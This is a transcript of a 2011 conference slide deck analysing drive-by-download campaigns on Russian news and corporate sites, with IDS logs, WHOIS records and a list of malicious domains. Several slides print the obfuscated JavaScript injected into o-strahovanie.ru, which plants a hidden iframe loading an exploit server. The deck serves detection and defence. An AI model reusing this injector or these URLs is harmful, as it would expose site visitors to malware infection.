SlideShare una empresa de Scribd logo

Drive-By Download Evolution and Detection After Vulnerability Disclosure

Sergey Soldatov
Sergey Soldatov
TecnologíaDiseño
1 de 67
Drive-By-Download Attack Evolution Before and After Vulnerability Disclosure Vladimir B. Kropotov TBINFORM (TNK-BP Group)
Drive-By-Download • Hackers distribute malware by "poisoning" legitimate websites • Hacker injects malicious iframes into HTML content • Vulnerabilities in Browsers, Acrobat, Java, Flash Player, etc, used You just want information by attacker about insurance, nothing more, but…
What does it look like? Host ready Malware Malware server controlled by attacker PC connected to the Internet Exploit OS, browser plugins, etc. INFO Exploit server controlled by attacker Known server with Intermediate server iframe controlled by attacker
How we find it? Date/Time 2011-08-05 10:44:53 YEKST Tag Name PDF_XFA_Script Observance Type Intrusion Detection Cleared Flag false Target IP Address 10.X.X.X Target Object Name 9090 Target Object Type Target Port Target Service unknown Source IP Address 10.X.X.Y SourcePort Name 2359 :compressed zlib :server total.logeater.org :URL //images/np/45eeb b038bd46a63e08665f308 1fb408/6cd14aca5927118 2c8a04159f9ad2804.pdf
DOES USER NEED IT?? How we find it? Date/Time 2011-08-05 10:44:53 Tag Name PDF_XFA_Script Target IP Address 10.X.X.X Target Object Name 9090 Target Object Type Target Port Source IP Address 10.X.X.Y SourcePort Name 2359 :compressed zlib :server total.logeater.org :URL //images/np/45eebb 038bd46a63e08665f3081 fb408/6cd14aca59271182 c8a04159f9ad2804.pdf
First indicators Date/Time 2011-07-26 11:24:37 Tag Name PDF_XFA_Script arg 3592ba48df0fae9e5f5c5b09535a 070d0b04020600510f0c56075c0 6040750 compressed zlib server mamjhvbw.dyndns.pro URL /ghqlv3ym/
First indicators Date/Time 2011-08-16 13:24:44 Tag Name ActiveX_Warning :clsid CAFEEFAC-DEC7-0000-0000- ABCDEFFEDCBA server skipetar.in URL /jb/pda.js Date/Time 2011-08-18 19:00:13 Tag Name ActiveX_Warning clsid CAFEEFAC-DEC7-0000-0000- ABCDEFFEDCBA server e1in.in URL /stat/574a353789f/pda.js
First indicators Date/Time 2011-08-09 10:17:14 Tag Name PDF_XFA_Script arg host=http://inaptly.in&b=486def4 compressed gzip server inaptly.in URL /jb/lastrger.php Date/Time 2011-08-14 14:06:28 Date/Time 2011-08-18 19:00:13 Tag Name PDF_XFA_Script Tag Name PDF_XFA_Script :arg host=http://oligist.in&b=486def4 arg host=http://e1in.in/stat&u=root :compressed gzip compressed zlib :server oligist.in server e1in.in URL /stat/574a353789f/lastrger.php :URL /jb/lastrger.php
First indicators Date/Time 2011-07-26 11:24:37 Date/Time 2011-08-09 10:17:14 Date/Time 2011-08-16 13:24:44 Tag Name PDF_XFA_Script Tag Name PDF_XFA_Script arg host=http://inaptly.in&b=486def4 Tag Name ActiveX_Warning compressed gzip :clsid CAFEEFAC-DEC7-0000-0000- arg 3592ba48df0fae9e5f5c5b09535a ABCDEFFEDCBA 070d0b04020600510f0c56075c0 server inaptly.in 6040750 compressed zlib server skipetar.in server mamjhvbw.dyndns.pro URL /jb/lastrger.php URL /jb/pda.js URL /ghqlv3ym/ Date/Time 2011-08-14 14:06:28 Date/Time 2011-08-18 19:00:13 Date/Time 2011-08-18 19:00:13 Tag Name PDF_XFA_Script Tag Name ActiveX_Warning Tag Name PDF_XFA_Script :arg host=http://oligist.in&b=486def4 arg host=http://e1in.in/stat&u=root clsid CAFEEFAC-DEC7-0000-0000- :compressed gzip compressed zlib ABCDEFFEDCBA :server oligist.in server e1in.in server e1in.in URL /stat/574a353789f/lastrger.php URL /stat/574a353789f/pda.js :URL /jb/lastrger.php
Example: o-strahovanie.ru
Example: o-strahovanie.ru
Example: o-strahovanie.ru SEP 02 / ============ bbb ============document.xmlSettings.if_ik=false;if(window.localS torage){ if(window.localStorage.if_ik){ if(parseInt(window.localStorage.if_ik)+2592000 < document.xmlSettings.time()) document.xmlSettings.if_ik=true; }else document.xmlSettings.if_ik=true;}else{// 4 osel if(document.xmlSettings.getCookie('if_ik')){ if(parseInt(document.xmlSettings.getCookie('if_ik'))+2592000 < document.xmlSettings.time()) document.xmlSettings.if_ik=true; }else document.xmlSettings.if_ik=true; }if(document.xmlSettings.if_ik){ if(window.localStorage)window.localStorage.if_ik=docu ment.xmlSettings.time(); else document.xmlSettings.setCookie('if_ik',document.xmlSettings.ti me(),{ expires:(document.xmlSettings.time() + 86400*365) }); Cookie: document.xmlSettings.iframe=document.createElement ('iframe'); if_ik1315314771 document.xmlSettings.iframe.style.cssText='height:1px; www.o-strahovanie.ru/ position:absolute;width:1px;border:none;left:- 5000px;'; 16004293056256333102392 document.body.appendChild(document.xmlSettings.ifra 93001403230174358* me); document.xmlSettings.iframe.src='htt'+'p://'+'disreg'+'a rding.i'+'n/xtqd2/08.p'+'hp';}
Example: o-strahovanie.ru / ============ bbb ============ else{// 4 osel if(document.xmlSettings.getCookie('if_ik')){ document.xmlSettings.iframe= document.createElement('iframe'); document.xmlSettings.iframe.style.cssText= 'height:1px;position:absolute;width:1px;border:none;left:-5000px;'; document.body.appendChild(document.xmlSettings.iframe); document.xmlSettings. iframe.src='htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';} Cookie: if_ik1315314771 www.o-strahovanie.ru/ 1600429305625633310239293001403230174358*
Example: o-strahovanie.ru else{// 4 osel … document.body.appendChild(document.xmlSettings.iframe); document.xmlSettings.iframe.src= 'htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';} iframe.src= 'http://disregarding.in/xtqd2/08.php'
Drive By Download o-strahovanie.ru Sep 02 NO Host ready Malware Malware server PC connected to the Internet Exploit NO OS, browser plugins, etc. INFO Exploit server Known server with Intermediate server iframe disregarding.in
Drive By Download o-strahovanie.ru Sep 12 Host ready Malware Malware server chamberwoman.in PC connected to janiculum.in the Internet Exploit OS, browser plugins, etc. INFO Exploit server chamberwoman.in janiculum.in Known server with Intermediate server iframe disregarding.in
Example: o-strahovanie.ru Domain Name:DISREGARDING.IN Created On:14-Jul-2011 11:09:59 UTC Registrant Name:Russell Rosario Registrant Street1:136 Oakdale Avenue City:Winter Haven Registrant Country:US Email:russellsrosario@teleworm.com Name Server:NS1.PRIDES.ME Name Server:NS2.PRIDES.ME Domain Name:JANICULUM.IN, CHAMBERWOMAN.IN Created On:12-Sep-2011 08:14 UTC Registrant Name:Russell Rosario
Example: o-strahovanie.ru Domain Name:DISREGARDING.IN Created On:14-Jul-2011 11:09:59 UTC Domain Name:JANICULUM.IN, CHAMBERWOMAN.IN Created On:12-Sep-2011 08:14 UTC Registrant Name:Russell Rosario No Payload, because No Payload Requests? Are they looking for customers?
Example: o-strahovanie.ru Domain ID:D5165642-AFIN Domain Name:DISREGARDING.IN Created On:14-Jul-2011 11:09:59 UTC Registrant Name: Russell Rosario Registrant Street1:136 Oakdale Avenue City:Winter Haven Registrant Country:US Email:russellsrosario@teleworm.com Name Server:NS1.PRIDES.ME Name Server:NS2.PRIDES.ME
Russell Rosario Domain Name:FILTRATED.IN filtrated.in Created On:14-Jul-2011 11:09:53 UTC Sponsoring Registrar:Directi Web Services Pvt. Ltd. (R118-AFIN) Created On:14-Jul-2011 11:09:56 UTC Registrant ID:TS_16731618 raptnesses.in Registrant Name:Russell Rosario Registrant Street1:136 Oakdale Avenue Created On:14-Jul-2011 11:09:56 UTC Registrant City:Winter Haven Registrant State/Province:Florida tansies.in Registrant Postal Code:33830 Registrant Country:US Created On:14-Jul-2011 11:10:03 UTC Registrant Phone:+1.8635571308 Email:russellsrosario@teleworm.com But Sally Doesn't Know…
Attack before public disclosure • Primary location for malicious sites: .IN • Physical servers location by IP-Address: Romania • Responsible person: Russell Rosario • Domains are new
Domain owner is the same Domain Name Created On Registrant Name irrefutably.in 15-Jul-2011 11:00:21 UTC Russell Rosario comprador.in 25-Jul-2011 05:59:54 UTC Russell Rosario hyalines.in 29-Jul-2011 09:39:33 UTC Russell Rosario suffrago.in 01-Aug-2011 05:35:12 UTC Russell Rosario ruritanian.in 01-Aug-2011 05:35:50 UTC Russell Rosario 20-Jul-2011 Acrobat Vulnerability vendor notified
Vulnerability reported to vendor VUPEN Security Research - Adobe Acrobat and Reader PCX Processing Heap Overflow Vulnerability VUPEN Security Research - Adobe Acrobat and Reader IFF Processing Heap Overflow Vulnerability VUPEN Security Research - Adobe Acrobat and Reader Picture Dimensions Heap Overflow Vulnerability VUPEN Security Research - Adobe Acrobat and Reader TIFF BitsPerSample Heap Overflow Vulnerability X. DISCLOSURE TIMELINE ----------------------------- 2011-07-20 - Vulnerability Discovered by VUPEN and shared with TPP customers 2011-09-14 - Public disclosure ZDI-11-310 : Adobe Reader Compound Glyph Index Sign Extension Remote Code Execution Vulnerability -- Disclosure Timeline: 2011-07-20 - Vulnerability reported to vendor 2011-10-26 - Coordinated public release of advisory ZDI-11-316 : Apple QuickTime H264 Matrix Conversion Remote Code Execution Vulnerability -- Disclosure Timeline: 2011-07-20 - Vulnerability reported to vendor 2011-10-27 - Coordinated public release of advisory
Harvetering machine started Domain Name Created On Registrant Name microdrili.in 05-Aug-2011 07:13:08 UTC Russell Rosario oligist.in 05-Aug-2011 07:13:12 UTC Russell Rosario provost.in 05-Aug-2011 07:13:18 UTC Russell Rosario vaginalitis.in 05-Aug-2011 07:13:25 UTC Russell Rosario kremlinology.in 05-Aug-2011 07:13:35 UTC Russell Rosario invariance.in 05-Aug-2011 07:13:41 UTC Russell Rosario alleghenian.in 05-Aug-2011 07:13:48 UTC Russell Rosario dandifies.in 05-Aug-2011 07:14:06 UTC Russell Rosario xenophoby.in 05-Aug-2011 07:14:09 UTC Russell Rosario alliaria.in 05-Aug-2011 07:14:15 UTC Russell Rosario skipetar.in 05-Aug-2011 07:14:21 UTC Russell Rosario inaptly.in 05-Aug-2011 07:15:05 UTC Russell Rosario allhallowtide.in 05-Aug-2011 07:15:20 UTC Russell Rosario
But may be someone knows? • Spamlists • AV Vendors • Safebrowsing • Securityfocus
Spamlists, Aug 19
AV Vendors, Aug 18
Safebrowsing Aug 20
Securityfocus Sep 07 Sent: Wednesday, September 07, 2011 11:31 PM Subject: There is a strange get request header in all web pages of my site? I'm worry about Trojan attack! Today I found that Kasper Anti Virus has blocked my site and says to the clients that this site is affected by a Trojan. I traced my site with Fiddler debugging tool and I found that every time I send a request to the site a GET request handler is established to the following URL: "http://carlos.c0m.li/iframe.php?id=v4pfa2 4nw91yhoszkdmoh413ywv6cp7"
PDF vulnerabilities public disclosure Sep 14. What to expect?
PDF vulnerabilities public disclosure Sep 14. What to expect? NO GOOD NEWS, JUST EPIC FAIL for site administrators
No good news. Hundreds of domains were registered ITALIA-NEW.IN KLERK-EVEN.RU BANER-KLERK.RU KLERK-EVENTS.RU BANK-KLERK.RU KLERK-LAW.RU BANNER-KLERK.RU KLERK-NEW.RU BLOGS-KLERK.RU KLERK-NEWS.RU BUH-KLERK.RU KLERK-REKLAMA.RU DAILY-KP.RU KLERK-RU.RU FORUM-KLERK.RU KLERK-WORK.RU I-OBOZREVATEL.RU KLERK2.RU INTERFAX-REGION.RU OBOZREVATEL-RU.RU JOB-KLERK.RU OBOZREVATELRU.RU KLERK-BANK.RU WIKI-KLERK.RU KLERK-BANKIR.RU PRESS-RZD.RU KLERK-BIZ.RU RZD-RZD.RU KLERK-BOSS.RU IPGEOBASE.IN KLERK-BUH.RU ***
“New generation” Host ready Malware Malware server controlled by attacker PC connected to Exploit the Internet OS, browser plugins, etc. INFO Exploit server controlled by attacker Intermediate server controlled by attacker Known server with Other known server iframe NOT controlled by attacker
Attack after public disclosure • Primary location for malicious sites: .IN, .RU, .CX.CC, .BIZ, .INFO,… • Physical servers location by IP-Address: International • Domains registered to different spurious persons • Domain lifetime ~ time to Blacklists appearance • Attack refers to malicious server for a short period of time, and to well known one almost all day long (Blacklist evasion technique) • If you don't know exact malware URL, site redirects to well known server • Different types of payload used: password stealers, win lockers, and even “normal” (or another ZD) files installed
Known sites examples: RZD.RU Russian rail roads
Known sites examples: RZD.RU
Just TWO Domains, SURE? Domain URL interfax-rzd.in http://interfax-rzd.in/news/buble.php?key=rtgddfg%26u=root rzd-interfax-online.in http://rzd-interfax-online.in/rzd-news/buble.php?key=rtgddfg%26u=root news-rzdstyle.in http://news-rzdstyle.in/new-mail/buble.php?key=rtgddfg%26u=root rzd-rzd.in http://rzd-rzd.in/rzd5/buble.php?key=rtgddfg%26u=root therzd-rzd.in http://therzd-rzd.in/rzd5/buble.php?key=rtgddfg%26u=root rzd-rzdcomp.in http://rzd-rzdcomp.in/rzd5/buble.php?key=rtgddfg%26u=root rzd-rzdcomp.in http://rzd-rzdcomp.in/rzd5/exe.php?exp=newjava%26key=rtgddfg%26u=root rzd-rzdcomp.in http://rzd-rzdcomp.in/rzd5/exe.php?exp=newjava%26key=rtgddfg%26u=root;1 press-rzd.in http://press-rzd.in/rzd/buble.php?key=rtgddfg%26u=root rzd-press.in http://rzd-press.in/rzd/buble.php?key=rtgddfg%26u=root rzd-banner.in http://rzd-banner.in/rzd/buble.php?key=rtgddfg%26u=root pass-rzd.in http://pass-rzd.in/rzd/buble.php?key=rtgddfg%26u=root rzd-ticket.in http://rzd-ticket.in/zd/buble.php?key=rtgddfg%26u=root
Known sites examples: RZD.RU Russian rail roads
Known sites examples: RZD.RU
Known sites examples: KP.RU (Komsomolskaya Pravda, newspaper)
Known sites examples: KP.RU
Other examples: EG.RU (newspaper, 263 685 visits per day)
Other examples: svpressa.ru (newspaper 276 720 visits per day)
URA.RU (news 22 486 visits per day)
URA.RU (news 22 486 visits per day)
URA.RU (news 22 486 visits per day)
Other examples: ria.ru (news 667 222 visits per day) Datetime [09/Nov/2011:12:26:45 +0300] Url GET http://jya56yhsvcsss.com/BVRQ HTTP/1.0 IP 176.9.50.178 Site jya56yhsvcsss.com Referrer http://ria.ru/
Other examples: inosmi.ru (news 175 361visits per day) Datetime [09/Nov/2011:12:28:10 +0300] Url GET http://jya56yhsvcsss.com/BVRQ HTTP/1.1 IP 176.9.50.178 Site jya56yhsvcsss.com Referrer http://inosmi.ru/
Other examples: glavbukh.ru (15 200 visits per day) Datetime [09/Nov/2011:12:14:46 +0300] Url GET http://jya56yhsvcsss.com/BVRQ HTTP/1.0 IP 176.9.50.178 Site jya56yhsvcsss.com Referrer http://www.glavbukh.ru/
Malware examples: Banks targeted attack
Malware examples: Banks targeted attack
Another news, another phone… • Legal • Faked
Malware examples: Banks targeted attack
Malware examples: Banks targeted attack
Malware examples 01ie.ru, 02ie.ru, 03ie.ru (Registered by reg.ru)
Malware examples 01ie.ru, 02ie.ru, 03ie.ru (Registered by reg.ru)
Malware examples
Script examples
Sample analysis (Virus Total)
Sample analysis (Virus Total)
Sample analysis (Virus Total)
Sample analysis (Virus Total)
Sample analysis (Virus Total)
Sample analysis (Virus Total)
What can we do? • Patch endpoint • Tighten the Internet filtering (default deny if possible) • No Internet surfing with admin rights • See what’s happening (continuous monitoring) • Check if you’re well (regular technical audits) • Educate people
Credits • Sergey V. Soldatov, TBINFORM (TNK-BP Group) • Konstantin Y. Kadushkin, TBINFORM (TNK-BP Group) • Wayne Huang, ARMORIZE
THE END Vladimir B. Kropotov Information security analyst TBINFORM (TNK-BP Group) vbkropotov@tnk-bp.com kropotov@ieee.org

Recomendados

Php version 5
Php version 5Php version 5
Php version 5Manuel Rodriguez
 
PHP & Performance
PHP & PerformancePHP & Performance
PHP & Performance毅 吕
 
How we use and deploy Varnish at Opera
How we use and deploy Varnish at OperaHow we use and deploy Varnish at Opera
How we use and deploy Varnish at OperaCosimo Streppone
 
extending-php
extending-phpextending-php
extending-phptutorialsruby
 
php & performance
php & performance php & performance
php & performancesimon8410
 
Reverse proxies & Inconsistency
Reverse proxies & InconsistencyReverse proxies & Inconsistency
Reverse proxies & InconsistencyGreenD0g
 
Does your configuration code smell?
Does your configuration code smell?Does your configuration code smell?
Does your configuration code smell?Tushar Sharma
 
Hyperledger composer
Hyperledger composerHyperledger composer
Hyperledger composerwonyong hwang
 

Recomendados

Php version 5
Php version 5Php version 5
Php version 5Manuel Rodriguez
 
PHP & Performance
PHP & PerformancePHP & Performance
PHP & Performance毅 吕
 
How we use and deploy Varnish at Opera
How we use and deploy Varnish at OperaHow we use and deploy Varnish at Opera
How we use and deploy Varnish at OperaCosimo Streppone
 
extending-php
extending-phpextending-php
extending-phptutorialsruby
 
php & performance
php & performance php & performance
php & performancesimon8410
 
Reverse proxies & Inconsistency
Reverse proxies & InconsistencyReverse proxies & Inconsistency
Reverse proxies & InconsistencyGreenD0g
 
Does your configuration code smell?
Does your configuration code smell?Does your configuration code smell?
Does your configuration code smell?Tushar Sharma
 
Hyperledger composer
Hyperledger composerHyperledger composer
Hyperledger composerwonyong hwang
 
Hadoop Admin role & Hive Data Warehouse support
Hadoop Admin role & Hive Data Warehouse supportHadoop Admin role & Hive Data Warehouse support
Hadoop Admin role & Hive Data Warehouse supportmdcdwh
 
Weird proxies/2 and a bit of magic
Weird proxies/2 and a bit of magic Weird proxies/2 and a bit of magic
Weird proxies/2 and a bit of magic GreenD0g
 
Speed up web APIs with Expressive and Swoole (PHP Day 2018)
Speed up web APIs with Expressive and Swoole (PHP Day 2018) Speed up web APIs with Expressive and Swoole (PHP Day 2018)
Speed up web APIs with Expressive and Swoole (PHP Day 2018) Zend by Rogue Wave Software
 
ApacheConNA 2015: What's new in Apache httpd 2.4
ApacheConNA 2015: What's new in Apache httpd 2.4ApacheConNA 2015: What's new in Apache httpd 2.4
ApacheConNA 2015: What's new in Apache httpd 2.4Jim Jagielski
 
The worst Ruby codes I’ve seen in my life - RubyKaigi 2015
The worst Ruby codes I’ve seen in my life - RubyKaigi 2015The worst Ruby codes I’ve seen in my life - RubyKaigi 2015
The worst Ruby codes I’ve seen in my life - RubyKaigi 2015Fernando Hamasaki de Amorim
 
Site Performance - From Pinto to Ferrari
Site Performance - From Pinto to FerrariSite Performance - From Pinto to Ferrari
Site Performance - From Pinto to FerrariJoseph Scott
 
Puppet at Opera Sofware - PuppetCamp Oslo 2013
Puppet at Opera Sofware - PuppetCamp Oslo 2013Puppet at Opera Sofware - PuppetCamp Oslo 2013
Puppet at Opera Sofware - PuppetCamp Oslo 2013Cosimo Streppone
 
Submit PHP: Standards in PHP world. Михайло Морозов
Submit PHP: Standards in PHP world. Михайло МорозовSubmit PHP: Standards in PHP world. Михайло Морозов
Submit PHP: Standards in PHP world. Михайло МорозовBinary Studio
 
httpd — Apache Web Server
httpd — Apache Web Serverhttpd — Apache Web Server
httpd — Apache Web Serverwebhostingguy
 
PECL Picks - Extensions to make your life better
PECL Picks - Extensions to make your life betterPECL Picks - Extensions to make your life better
PECL Picks - Extensions to make your life betterZendCon
 
On UnQLite
On UnQLiteOn UnQLite
On UnQLitecharsbar
 
kubernetes practice
kubernetes practicekubernetes practice
kubernetes practicewonyong hwang
 
Docker practice
Docker practiceDocker practice
Docker practicewonyong hwang
 
Using and scaling Rack and Rack-based middleware
Using and scaling Rack and Rack-based middlewareUsing and scaling Rack and Rack-based middleware
Using and scaling Rack and Rack-based middlewareAlona Mekhovova
 
Datagrids with Symfony 2, Backbone and Backgrid
Datagrids with Symfony 2, Backbone and BackgridDatagrids with Symfony 2, Backbone and Backgrid
Datagrids with Symfony 2, Backbone and Backgrideugenio pombi
 
WordPress Home Server with Raspberry Pi
WordPress Home Server with Raspberry PiWordPress Home Server with Raspberry Pi
WordPress Home Server with Raspberry PiYuriko IKEDA
 
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry PiGrâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry PiJérémy Derussé
 
Rapid java backend and api development for mobile devices
Rapid java backend and api development for mobile devicesRapid java backend and api development for mobile devices
Rapid java backend and api development for mobile devicesciklum_ods
 
Год в Github bugbounty, опыт участия
Год в Github bugbounty, опыт участияГод в Github bugbounty, опыт участия
Год в Github bugbounty, опыт участияdefcon_kz
 
Bootstrapping multidc observability stack
Bootstrapping multidc observability stackBootstrapping multidc observability stack
Bootstrapping multidc observability stackBram Vogelaar
 
How to Design a Great API (using flask) [ploneconf2017]
How to Design a Great API (using flask) [ploneconf2017]How to Design a Great API (using flask) [ploneconf2017]
How to Design a Great API (using flask) [ploneconf2017]Devon Bernard
 
HTTP Caching and PHP
HTTP Caching and PHPHTTP Caching and PHP
HTTP Caching and PHPDavid de Boer
 

Más contenido relacionado

La actualidad más candente

Hadoop Admin role & Hive Data Warehouse support
Hadoop Admin role & Hive Data Warehouse supportHadoop Admin role & Hive Data Warehouse support
Hadoop Admin role & Hive Data Warehouse supportmdcdwh
 
Weird proxies/2 and a bit of magic
Weird proxies/2 and a bit of magic Weird proxies/2 and a bit of magic
Weird proxies/2 and a bit of magic GreenD0g
 
Speed up web APIs with Expressive and Swoole (PHP Day 2018)
Speed up web APIs with Expressive and Swoole (PHP Day 2018) Speed up web APIs with Expressive and Swoole (PHP Day 2018)
Speed up web APIs with Expressive and Swoole (PHP Day 2018) Zend by Rogue Wave Software
 
ApacheConNA 2015: What's new in Apache httpd 2.4
ApacheConNA 2015: What's new in Apache httpd 2.4ApacheConNA 2015: What's new in Apache httpd 2.4
ApacheConNA 2015: What's new in Apache httpd 2.4Jim Jagielski
 
The worst Ruby codes I’ve seen in my life - RubyKaigi 2015
The worst Ruby codes I’ve seen in my life - RubyKaigi 2015The worst Ruby codes I’ve seen in my life - RubyKaigi 2015
The worst Ruby codes I’ve seen in my life - RubyKaigi 2015Fernando Hamasaki de Amorim
 
Site Performance - From Pinto to Ferrari
Site Performance - From Pinto to FerrariSite Performance - From Pinto to Ferrari
Site Performance - From Pinto to FerrariJoseph Scott
 
Puppet at Opera Sofware - PuppetCamp Oslo 2013
Puppet at Opera Sofware - PuppetCamp Oslo 2013Puppet at Opera Sofware - PuppetCamp Oslo 2013
Puppet at Opera Sofware - PuppetCamp Oslo 2013Cosimo Streppone
 
Submit PHP: Standards in PHP world. Михайло Морозов
Submit PHP: Standards in PHP world. Михайло МорозовSubmit PHP: Standards in PHP world. Михайло Морозов
Submit PHP: Standards in PHP world. Михайло МорозовBinary Studio
 
httpd — Apache Web Server
httpd — Apache Web Serverhttpd — Apache Web Server
httpd — Apache Web Serverwebhostingguy
 
PECL Picks - Extensions to make your life better
PECL Picks - Extensions to make your life betterPECL Picks - Extensions to make your life better
PECL Picks - Extensions to make your life betterZendCon
 
On UnQLite
On UnQLiteOn UnQLite
On UnQLitecharsbar
 
Using and scaling Rack and Rack-based middleware
Using and scaling Rack and Rack-based middlewareUsing and scaling Rack and Rack-based middleware
Using and scaling Rack and Rack-based middlewareAlona Mekhovova
 
Datagrids with Symfony 2, Backbone and Backgrid
Datagrids with Symfony 2, Backbone and BackgridDatagrids with Symfony 2, Backbone and Backgrid
Datagrids with Symfony 2, Backbone and Backgrideugenio pombi
 
WordPress Home Server with Raspberry Pi
WordPress Home Server with Raspberry PiWordPress Home Server with Raspberry Pi
WordPress Home Server with Raspberry PiYuriko IKEDA
 

La actualidad más candente (16)

Hadoop Admin role & Hive Data Warehouse support
Hadoop Admin role & Hive Data Warehouse supportHadoop Admin role & Hive Data Warehouse support
Hadoop Admin role & Hive Data Warehouse support
 
Weird proxies/2 and a bit of magic
Weird proxies/2 and a bit of magic Weird proxies/2 and a bit of magic
Weird proxies/2 and a bit of magic
 
Speed up web APIs with Expressive and Swoole (PHP Day 2018)
Speed up web APIs with Expressive and Swoole (PHP Day 2018) Speed up web APIs with Expressive and Swoole (PHP Day 2018)
Speed up web APIs with Expressive and Swoole (PHP Day 2018)
 
ApacheConNA 2015: What's new in Apache httpd 2.4
ApacheConNA 2015: What's new in Apache httpd 2.4ApacheConNA 2015: What's new in Apache httpd 2.4
ApacheConNA 2015: What's new in Apache httpd 2.4
 
The worst Ruby codes I’ve seen in my life - RubyKaigi 2015
The worst Ruby codes I’ve seen in my life - RubyKaigi 2015The worst Ruby codes I’ve seen in my life - RubyKaigi 2015
The worst Ruby codes I’ve seen in my life - RubyKaigi 2015
 
Site Performance - From Pinto to Ferrari
Site Performance - From Pinto to FerrariSite Performance - From Pinto to Ferrari
Site Performance - From Pinto to Ferrari
 
Puppet at Opera Sofware - PuppetCamp Oslo 2013
Puppet at Opera Sofware - PuppetCamp Oslo 2013Puppet at Opera Sofware - PuppetCamp Oslo 2013
Puppet at Opera Sofware - PuppetCamp Oslo 2013
 
Submit PHP: Standards in PHP world. Михайло Морозов
Submit PHP: Standards in PHP world. Михайло МорозовSubmit PHP: Standards in PHP world. Михайло Морозов
Submit PHP: Standards in PHP world. Михайло Морозов
 
httpd — Apache Web Server
httpd — Apache Web Serverhttpd — Apache Web Server
httpd — Apache Web Server
 
PECL Picks - Extensions to make your life better
PECL Picks - Extensions to make your life betterPECL Picks - Extensions to make your life better
PECL Picks - Extensions to make your life better
 
On UnQLite
On UnQLiteOn UnQLite
On UnQLite
 
kubernetes practice
kubernetes practicekubernetes practice
kubernetes practice
 
Docker practice
Docker practiceDocker practice
Docker practice
 
Using and scaling Rack and Rack-based middleware
Using and scaling Rack and Rack-based middlewareUsing and scaling Rack and Rack-based middleware
Using and scaling Rack and Rack-based middleware
 
Datagrids with Symfony 2, Backbone and Backgrid
Datagrids with Symfony 2, Backbone and BackgridDatagrids with Symfony 2, Backbone and Backgrid
Datagrids with Symfony 2, Backbone and Backgrid
 
WordPress Home Server with Raspberry Pi
WordPress Home Server with Raspberry PiWordPress Home Server with Raspberry Pi
WordPress Home Server with Raspberry Pi
 

Similar a Drive-By Download Evolution and Detection After Vulnerability Disclosure

Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry PiGrâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry PiJérémy Derussé
 
Rapid java backend and api development for mobile devices
Rapid java backend and api development for mobile devicesRapid java backend and api development for mobile devices
Rapid java backend and api development for mobile devicesciklum_ods
 
Год в Github bugbounty, опыт участия
Год в Github bugbounty, опыт участияГод в Github bugbounty, опыт участия
Год в Github bugbounty, опыт участияdefcon_kz
 
Bootstrapping multidc observability stack
Bootstrapping multidc observability stackBootstrapping multidc observability stack
Bootstrapping multidc observability stackBram Vogelaar
 
How to Design a Great API (using flask) [ploneconf2017]
How to Design a Great API (using flask) [ploneconf2017]How to Design a Great API (using flask) [ploneconf2017]
How to Design a Great API (using flask) [ploneconf2017]Devon Bernard
 
HTTP Caching and PHP
HTTP Caching and PHPHTTP Caching and PHP
HTTP Caching and PHPDavid de Boer
 
Swift profiling middleware and tools
Swift profiling middleware and toolsSwift profiling middleware and tools
Swift profiling middleware and toolszhang hua
 
Building Scalable Websites with Perl
Building Scalable Websites with PerlBuilding Scalable Websites with Perl
Building Scalable Websites with PerlPerrin Harkins
 
Heavy Web Optimization: Backend
Heavy Web Optimization: BackendHeavy Web Optimization: Backend
Heavy Web Optimization: BackendVõ Duy Tuấn
 
Apache and PHP: Why httpd.conf is your new BFF!
Apache and PHP: Why httpd.conf is your new BFF!Apache and PHP: Why httpd.conf is your new BFF!
Apache and PHP: Why httpd.conf is your new BFF!Jeff Jones
 
Profiling PHP with Xdebug / Webgrind
Profiling PHP with Xdebug / WebgrindProfiling PHP with Xdebug / Webgrind
Profiling PHP with Xdebug / WebgrindSam Keen
 
UEMB200: Next Generation of Endpoint Management Architecture and Discovery Se...
UEMB200: Next Generation of Endpoint Management Architecture and Discovery Se...UEMB200: Next Generation of Endpoint Management Architecture and Discovery Se...
UEMB200: Next Generation of Endpoint Management Architecture and Discovery Se...Ivanti
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecuritiesamiable_indian
 
Debugging: Rules & Tools
Debugging: Rules & ToolsDebugging: Rules & Tools
Debugging: Rules & ToolsIan Barber
 
NLIT 2011: Chef & Capistrano
NLIT 2011: Chef & CapistranoNLIT 2011: Chef & Capistrano
NLIT 2011: Chef & Capistranonickblah
 
Lean Php Presentation
Lean Php PresentationLean Php Presentation
Lean Php PresentationAlan Pinstein
 

Similar a Drive-By Download Evolution and Detection After Vulnerability Disclosure (20)

Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry PiGrâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
 
Rapid java backend and api development for mobile devices
Rapid java backend and api development for mobile devicesRapid java backend and api development for mobile devices
Rapid java backend and api development for mobile devices
 
Год в Github bugbounty, опыт участия
Год в Github bugbounty, опыт участияГод в Github bugbounty, опыт участия
Год в Github bugbounty, опыт участия
 
Bootstrapping multidc observability stack
Bootstrapping multidc observability stackBootstrapping multidc observability stack
Bootstrapping multidc observability stack
 
How to Design a Great API (using flask) [ploneconf2017]
How to Design a Great API (using flask) [ploneconf2017]How to Design a Great API (using flask) [ploneconf2017]
How to Design a Great API (using flask) [ploneconf2017]
 
HTTP Caching and PHP
HTTP Caching and PHPHTTP Caching and PHP
HTTP Caching and PHP
 
Swift profiling middleware and tools
Swift profiling middleware and toolsSwift profiling middleware and tools
Swift profiling middleware and tools
 
Building Scalable Websites with Perl
Building Scalable Websites with PerlBuilding Scalable Websites with Perl
Building Scalable Websites with Perl
 
Heavy Web Optimization: Backend
Heavy Web Optimization: BackendHeavy Web Optimization: Backend
Heavy Web Optimization: Backend
 
Apache and PHP: Why httpd.conf is your new BFF!
Apache and PHP: Why httpd.conf is your new BFF!Apache and PHP: Why httpd.conf is your new BFF!
Apache and PHP: Why httpd.conf is your new BFF!
 
